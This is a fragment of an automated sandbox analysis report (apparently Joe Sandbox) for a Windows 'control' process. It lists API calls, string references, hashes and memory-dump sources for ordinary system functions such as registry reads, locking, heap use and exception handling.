                                  • IsDebuggerPresent.KERNEL32(?,?,00876DE3,?,?,?,?,?,?,?,?,?,?,?,00877A2F,?), ref: 00876A1B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: DebuggerPresent
                                  • String ID:
                                  • API String ID: 1347740429-0
                                  APIs
                                  • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_00004500), ref: 00874555
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  APIs
                                  • FormatMessageW.KERNEL32(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00876451
                                  • GetCurrentThreadId.KERNEL32 ref: 008764B8
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CurrentFormatMessageThread
                                  • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                  • API String ID: 2411632146-3173542853
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  APIs
                                  • StrCmpICW.SHLWAPI(00000000,/name,?,-00000002,-00000004,-00000002,?,Shell32.dll,Control_RunDLL ,-00000002,?,?), ref: 0087AA4B
                                  • StrCmpICW.SHLWAPI(00000000,-name,?,?), ref: 0087AA5B
                                  • StrCmpICW.SHLWAPI(00000000,/page,00000000,?,?), ref: 0087AA9D
                                  • StrCmpICW.SHLWAPI(00000000,-page,?,?), ref: 0087AAAD
                                  • CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0(?,?,-00000002,-00000004,-00000002,?,Shell32.dll,Control_RunDLL ,-00000002,?,?), ref: 0087AAE7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: FreeTask
                                  • String ID: -name$-page$/name$/page$Shell32.dll,Control_RunDLL
                                  • API String ID: 734271698-926733048
                                  Strings
                                  • ExecuteOptions, xrefs: 04DB46A0
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04DB4655
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04DB4725
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04DB46FC
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04DB4742
                                  • Execute=1, xrefs: 04DB4713
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04DB4787
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  APIs
                                  • GetStartupInfoW.KERNEL32(?,0087AFD8,00000058), ref: 0087407F
                                  • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 008740B4
                                  • _amsg_exit.MSVCRT ref: 008740C9
                                  • _initterm.MSVCRT ref: 0087411D
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00874149
                                  • exit.MSVCRT ref: 008741BF
                                  • _ismbblead.MSVCRT ref: 008741DA
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
                                  • String ID:
                                  • API String ID: 359039474-0
                                  APIs
                                  • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000,?), ref: 008768C9
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ObjectSingleWait
                                  • String ID:
                                  • API String ID: 24740636-0
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,0000030C,-00000002), ref: 0087AB79
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00000104,00000000,?,?,?), ref: 0087ABD8
                                  • StrCmpICW.SHLWAPI(?,?), ref: 0087AC07
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,-000000FA), ref: 0087AC39
                                  • RegCloseKey.ADVAPI32(?), ref: 0087AC65
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls, xrefs: 0087AB2C
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CloseEnumEnvironmentExpandOpenStringsValue
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
                                  • API String ID: 1747309050-2787898152
                                  • Opcode ID: b3568f9e2f8c44dcba5b9df8f9a90252cfedc0bafce844e352ff4dbcc2551fdf
                                  • Instruction ID: a0c06a9e965f862baf2e7052d97f4692ed267ca6cd881ce5cc788ab6bae749d4
                                  • Opcode Fuzzy Hash: b3568f9e2f8c44dcba5b9df8f9a90252cfedc0bafce844e352ff4dbcc2551fdf
                                  • Instruction Fuzzy Hash: 664169B1A00228AFDB29DF54CC84BAE767AFB95310F0041A5E50EE7254DA729E94CF52
                                  APIs
                                  • AcquireSRWLockShared.KERNEL32(?), ref: 00877178
                                  • ReleaseSRWLockShared.KERNEL32(?), ref: 00877190
                                  • EnterCriticalSection.KERNEL32(?), ref: 008771AF
                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 008771B6
                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008771F9
                                  • LeaveCriticalSection.KERNEL32(?), ref: 00877222
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: Lock$AcquireCriticalExclusiveReleaseSectionShared$EnterLeave
                                  • String ID:
                                  • API String ID: 3221859647-0
                                  • Opcode ID: aefbbb21af2d750c859708f58dd0a57f1f2bddc965832ce30c647de8b86ed957
                                  • Instruction ID: 4e0dc98fc880d0895e6725c798c854c6dc4a74948eb9de0d9fc5639d41eac1f2
                                  • Opcode Fuzzy Hash: aefbbb21af2d750c859708f58dd0a57f1f2bddc965832ce30c647de8b86ed957
                                  • Instruction Fuzzy Hash: A1213B766083428BC714DF28D88891ABBBAFF94311F41496DF85AD7355DB30D889CBA2
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 0d82599263030bf92f2b18f50f6bbd0a3999bcdb29c3d9881b7e1cf44079e433
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 26818070E053499EDF24EE68C8517BEBBB1BF45310F18455FF861AB291D634B8418B64
                                  APIs
                                  • memset.MSVCRT ref: 0087A28A
                                  • GetProcessHeap.KERNEL32(00000000,?,008798B0,?,?,008798B0,00000001,00000000,00000000,?,?,?,?,?,008798B0,?), ref: 0087A316
                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,008798B0,?,?,?,?,00000001,?), ref: 0087A31D
                                  • GetProcessHeap.KERNEL32(00000000,008798B0,008798B0,?,?,008798B0,00000001,00000000,00000000,?,?,?,?,?,008798B0,?), ref: 0087A326
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,008798B0,?,?,?,?,00000001,?), ref: 0087A32D
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,008798B0,?,?,?,?,?,008798B0,?,?,?), ref: 0087A4C6
                                  • HeapFree.KERNEL32(00000000,?,?,00000000,008798B0,?,?,?,?,?,008798B0,?,?,?,?,00000001), ref: 0087A4CD
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free$Allocmemset
                                  • String ID:
                                  • API String ID: 4078862186-0
                                  • Opcode ID: 242ae5ba5444432887ba15b748f12193d5d6fcbcd9756373fc08312aae975774
                                  • Instruction ID: 1eb3a4cc597b78aa2482982dc5673e75b1fbee7399a32e22eb279a055d312453
                                  • Opcode Fuzzy Hash: 242ae5ba5444432887ba15b748f12193d5d6fcbcd9756373fc08312aae975774
                                  • Instruction Fuzzy Hash: 7D817671D002199FDB08CFA9C8846BEB7B4FF58300F14C16AE819EB645E774D981CB65
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: de3e142c1b090ff70191c43fb663f5aa2283085cf9bc8d2c320785f2d5553371
                                  • Instruction ID: 8156da702e878eaf64e4fd2586c3f37ce83469120ef611affc0d5e5b0e7f9e4c
                                  • Opcode Fuzzy Hash: de3e142c1b090ff70191c43fb663f5aa2283085cf9bc8d2c320785f2d5553371
                                  • Instruction Fuzzy Hash: 66213376A00119ABDB21DEA9DC40AFE77F8EF54744F450156EA05D3240E731E9058BA5
                                  APIs
                                  • GetCommandLineW.KERNEL32(?,00000002), ref: 0087383A
                                  • StrTrimW.SHLWAPI(-00000002,00871420), ref: 00873862
                                  • memset.MSVCRT ref: 00873870
                                  • GetStartupInfoW.KERNEL32(?), ref: 0087387C
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0087388F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CommandHandleInfoLineModuleStartupTrimmemset
                                  • String ID:
                                  • API String ID: 1556929265-0
                                  • Opcode ID: d033a6d8cd21c851605abe6065f4ba51a0fbebb7e695dddc5d10885a178c848f
                                  • Instruction ID: 62798a4701fff4c67471fffde55ebb6bfa765e4ac27bf4cbfd6de5f7510f23b7
                                  • Opcode Fuzzy Hash: d033a6d8cd21c851605abe6065f4ba51a0fbebb7e695dddc5d10885a178c848f
                                  • Instruction Fuzzy Hash: 4C01D232D0021893DB34A7908C49BAE7678FF85701F158029FD4DE3188E774DE86E2A3
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04DB02BD
                                  • RTL: Re-Waiting, xrefs: 04DB031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04DB02E7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 517f007585e63e9e7394a99f79e7a0521f1b0087ea174063bdd40048181cfd6b
                                  • Instruction ID: c86c71f0f563848cf0c668e2def3e94ec6bd88638d48274ec4e4168d073348b6
                                  • Opcode Fuzzy Hash: 517f007585e63e9e7394a99f79e7a0521f1b0087ea174063bdd40048181cfd6b
                                  • Instruction Fuzzy Hash: EEE1AC70608B41DFD725CF28D884B6AB7E0FB89314F144A5DE4A68B2E0E774F945CB92
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 04DB7BAC
                                  • RTL: Resource at %p, xrefs: 04DB7B8E
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04DB7B7F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 64f95a8f13d680034d433db61c065cc6d25e55aee37e4dfad63849ab8b256fea
                                  • Instruction ID: ee9b25b1556e6f591cee00a724b171dba1104f53415aef992a3e111d8dc90ccf
                                  • Opcode Fuzzy Hash: 64f95a8f13d680034d433db61c065cc6d25e55aee37e4dfad63849ab8b256fea
                                  • Instruction Fuzzy Hash: BD41B0317057029FD724DE25C840B6AB7E5FF89B18F100A1EF896DB680EB31F5058B91
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DB728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04DB7294
                                  • RTL: Re-Waiting, xrefs: 04DB72C1
                                  • RTL: Resource at %p, xrefs: 04DB72A3
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 52962a2fa4bcd49f28a28bf0264c26b123b85baafd111087ef7b2fc5cdb670d1
                                  • Instruction ID: 7283562af7631a3924425b8ab8b3d09fda743ebb313ab7c1ef06fdc8707d2bae
                                  • Opcode Fuzzy Hash: 52962a2fa4bcd49f28a28bf0264c26b123b85baafd111087ef7b2fc5cdb670d1
                                  • Instruction Fuzzy Hash: 8641D031740206AFD721DE25CC41BA6B7A5FF84718F14061DF996EB280EB31F8469BE1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 7f964c87a5ad4eef1640ca296d55f97fb0f28ef33491325fb1f682efe20666b4
                                  • Instruction ID: 2d4c4ffc6a60417d708f2f9c96ed5bc6b2fe09941592af7438d749bb055ada41
                                  • Opcode Fuzzy Hash: 7f964c87a5ad4eef1640ca296d55f97fb0f28ef33491325fb1f682efe20666b4
                                  • Instruction Fuzzy Hash: B1314372A006199FDB60DF29DC40BEE77E8FB44714F454599E949E3240EB31FA488BA1
                                  APIs
                                  • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002,::{7007ACC7-3202-11D1-AAD2-00805FC1270E},-00000002,?,?,00873C95,00000014,?,?), ref: 0087A968
                                  • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00871428,00000000,00000001,00871900,?,?,?,00873C95,00000014,?,?), ref: 0087A985
                                  • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,00873C95,00000014,?,?), ref: 0087A9DB
                                  Strings
                                  • ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}, xrefs: 0087A95F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CreateInitializeInstanceUninitialize
                                  • String ID: ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
                                  • API String ID: 948891078-2378036714
                                  • Opcode ID: 9f0f1295486336eb18df13fa6ec05f0acfc2f59bff1bf03537ca680e961e6495
                                  • Instruction ID: 7ca816cf0f02e23d8bd9dcc306f3077c4c8c047d5f373a389926cce05ffa62f3
                                  • Opcode Fuzzy Hash: 9f0f1295486336eb18df13fa6ec05f0acfc2f59bff1bf03537ca680e961e6495
                                  • Instruction Fuzzy Hash: 6111CE7A700614AFD7009B58DC49F1EBBB9EFC8720F254065FA09E7390DA71EC019BA0
                                  APIs
                                  • memset.MSVCRT ref: 00876C1D
                                  • ShellExecuteExW.SHELL32(00000001), ref: 00876C53
                                    • Part of subcall function 00878463: GetLastError.KERNEL32(00876C62), ref: 00878463
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ErrorExecuteLastShellmemset
                                  • String ID: ms-settings:about$open
                                  • API String ID: 486181658-1618534989
                                  • Opcode ID: cb0f3fbaa9fd32ed004a7ac60614d84ecc8e8d583ce2fb329d74f982a68e18e4
                                  • Instruction ID: 04e0c7aac84c57deb802203241b34caf70e7aa427927e3dd2ab4f5d259303ca6
                                  • Opcode Fuzzy Hash: cb0f3fbaa9fd32ed004a7ac60614d84ecc8e8d583ce2fb329d74f982a68e18e4
                                  • Instruction Fuzzy Hash: F0015A71518301ABC700EF58C849B9F7BE8FB843A8F00891CF48CD2295DB74D6488B97
                                  APIs
                                  • GetModuleHandleW.KERNEL32(kernelbase.dll), ref: 0087909B
                                  • GetProcAddress.KERNEL32(00000000,RaiseFailFastException), ref: 008790A7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: RaiseFailFastException$kernelbase.dll
                                  • API String ID: 1646373207-919018592
                                  • Opcode ID: 7cb941b62f077423dd2da93eb937e50443a0d7972ee27a50a9db87dfe07e5813
                                  • Instruction ID: 5cce24bd34439b78daca3a6845f78e8043bab2de8f3de7e124113e014a375cac
                                  • Opcode Fuzzy Hash: 7cb941b62f077423dd2da93eb937e50443a0d7972ee27a50a9db87dfe07e5813
                                  • Instruction Fuzzy Hash: B7E0EC3A901729BB8B212F95AC0CC9A7F29FF85BA17048011F91D92228CA31C851DBE0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: memcpy_s
                                  • String ID:
                                  • API String ID: 1502251526-0
                                  • Opcode ID: b86026babd361136a39d6b318136d51b40fb0ef700b0e3b673206443be32d419
                                  • Instruction ID: 156fe87ec57c3679a7d2b6ec7d7ead4d0c17def8f1b0bec7effab6e4102d351b
                                  • Opcode Fuzzy Hash: b86026babd361136a39d6b318136d51b40fb0ef700b0e3b673206443be32d419
                                  • Instruction Fuzzy Hash: 8821D174500218ABDB10DF58CC89AAABBB9FF05714F948085E958DB249E334EE91CBB4
                                  APIs
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00000104,00000000,?,?,?), ref: 0087ABD8
                                  • StrCmpICW.SHLWAPI(?,?), ref: 0087AC07
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,-000000FA), ref: 0087AC39
                                  • RegCloseKey.ADVAPI32(?), ref: 0087AC65
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CloseEnumEnvironmentExpandStringsValue
                                  • String ID:
                                  • API String ID: 171902810-0
                                  • Opcode ID: 99fca5e51bb598782e6cd693aafe3f379e221e77d4215e4cf89ebe3ad02ffa5a
                                  • Instruction ID: 7c0fdbf57ea9a70cf198dea6a6079eea34cf9343076f72299bae9c75a096c775
                                  • Opcode Fuzzy Hash: 99fca5e51bb598782e6cd693aafe3f379e221e77d4215e4cf89ebe3ad02ffa5a
                                  • Instruction Fuzzy Hash: 9F2139B1A00118AFCB29DF14CC89BAE737AFBD1311F104299E50EE6154DB329EA4CF52
                                  APIs
                                  • EnterCriticalSection.KERNEL32 ref: 00878D70
                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 00878D79
                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 00878DA1
                                  • LeaveCriticalSection.KERNEL32 ref: 00878DAC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CriticalExclusiveLockSection$AcquireEnterLeaveRelease
                                  • String ID:
                                  • API String ID: 1115728412-0
                                  • Opcode ID: eb0dc29693d578c3069b6f0c738f02decad2abd570f168179a875ca98ad8db13
                                  • Instruction ID: beb2d187cf2e63a41e8f6b8df971715458adba46ffa21db283dcdbfd5952b3f4
                                  • Opcode Fuzzy Hash: eb0dc29693d578c3069b6f0c738f02decad2abd570f168179a875ca98ad8db13
                                  • Instruction Fuzzy Hash: 35F09072101A18EFCB305F55D88CB997FB8FF24366F108119E94DC6164CB71C896CB80
                                  APIs
                                    • Part of subcall function 008745D8: GetModuleHandleW.KERNEL32(00000000), ref: 008745DF
                                  • __set_app_type.MSVCRT ref: 00873FC2
                                  • __p__fmode.MSVCRT ref: 00873FD8
